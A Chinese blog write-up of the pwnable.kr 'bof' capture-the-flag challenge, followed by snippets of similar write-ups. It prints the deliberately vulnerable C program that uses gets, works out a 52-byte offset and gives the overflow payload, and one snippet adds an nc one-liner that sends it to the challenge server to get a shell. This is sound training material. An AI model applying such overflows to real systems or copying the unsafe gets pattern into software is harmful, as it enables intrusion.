[pwnable.kr]bof

最新推荐文章于 2023-10-06 18:19:26 发布
最新推荐文章于 2023-10-06 18:19:26 发布
阅读量133 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iekuil/article/details/127079433
本文介绍了一个简单的C程序中的安全漏洞,通过使用不安全的gets函数导致缓冲区溢出。文章详细分析了如何构造特定的输入来覆盖变量key的值,使程序执行shell命令。关键步骤包括确定内存布局、计算偏移量及填充正确的覆盖值。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

目标很明确,
gets函数在读取输入时没有限制字符串长度,
我们需要把变量key的值覆盖成0xcafebabe,
好让if语句中的判断为真

在这里插入图片描述
用ida很方便地看到s的地址是ebp-2ch,
根据函数调用的过程,
返回地址是ebp+4,
第一个参数地址是ebp+8,
相差44+8个字节,
再加上要覆盖key变量的目标值0xcafebabe
总长度56个字节,
考虑小端法存储,
字符串的内容是 任意字符*52+‘\xbe\xba\xfe\xca’

弄个脚本
在这里插入图片描述

在这里插入图片描述

pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 549
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1893
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
pwnable.kr-bof
qq_35661990的博客
09-09 303
#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key...
pwnable.krbof
river
05-01 4468
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
pwnable.kr --- bof题解
Yannie's Blog
12-11 1286
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;string.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; void func(int key) { char overflowme[32]; printf(&
pwnable.kr入门pwn系列教程(3)
NoOneGroup
07-26 775
博客已经转移 https://noone-hub.github.io/ 题目不多讲,直接贴代码,如果不会这些个过程看前面教程 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overf...
lets paly a game 攻防世界
最新发布
07-30
我们注意到用户的问题中提到了“lets play a game pwnhub”,结合用户意图中的“攻防世界”,可以推测用户可能想参与CTF...2. Pwnable.kr:提供渐进式挑战("fd"、"bof"等) 3. ROP Emporium:ROP链构造专项训练
pwnable.krbof
leeham的博客
08-30 657
pwnable.krbof 这是一道缓冲区溢出的题目
pwnable.krbof
think_ycx的专栏
07-08 563
下载程序wget http://pwnable.kr/bin/bof wget http://pwnable.kr/bin/bof.c程序调用gets获取字符串s [ebp-2Ch]和传入的参数a1 [ebp+8] 比较,stack overflow padding:0x2C + 0x8。IDA pseudocodeunsigned int __cdecl func(int a1) { cha...
pwnable.kr-bof WP
Casuall的博客
03-24 5699
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
pwnable.kr BOF wp
moep0的博客
10-28 324
放到ida里面反编译一下 gets不要太明显(gets不会对输入的字符串长度进行判断) 这个时候我发现,原来有源码。。。 没关系,拿ida看一下overflowmw和key的位置 发现相差52个byte 第一次写exp,找了一份大佬的 运行一下 成功 ...
pwnable.kr bof,flag,passcode,random
weixin_51890658的博客
10-06 115
welcome函数中如果要输入100个字节的话,最后四位可以覆盖掉passcode1的地址,然后在第一个scanf输入时因为没有&符,所以可以把fflush的got表改为system("/bin/cat flag")的地址,然后再执行fllush函数时即可获得flag。大家先了解下异或,是一个很简单的运算符,例如 两个相同的数异或等于0 a^a=0 如果a^b=c 则a^c=b c^b=a。通过gdb分析,Welcome函数中name的输入可以用来覆盖passcode1的值。
pwnable.kr-----解题过程】bof
lyuchen65的博客
09-16 2469
#include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); if(key == 0xcafebabe){ system("/bin/sh"); } else {
pwnable 笔记 Toddler's Bottle - bof
HiTaQini
11-16 1999
缓存区溢出
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 1331
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
pwnable.kr wp&总结
Ree的整理与收集
08-30 1093
1.fd2.collision3.bof(python -c ‘print “A” * 52 + “\xbe\xba\xfe\xca”’; cat -) | nc pwnable.kr 9000 python -c 参数 linux | 命令:command 1 | command 2 把command 1的结果传给command 2做参数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值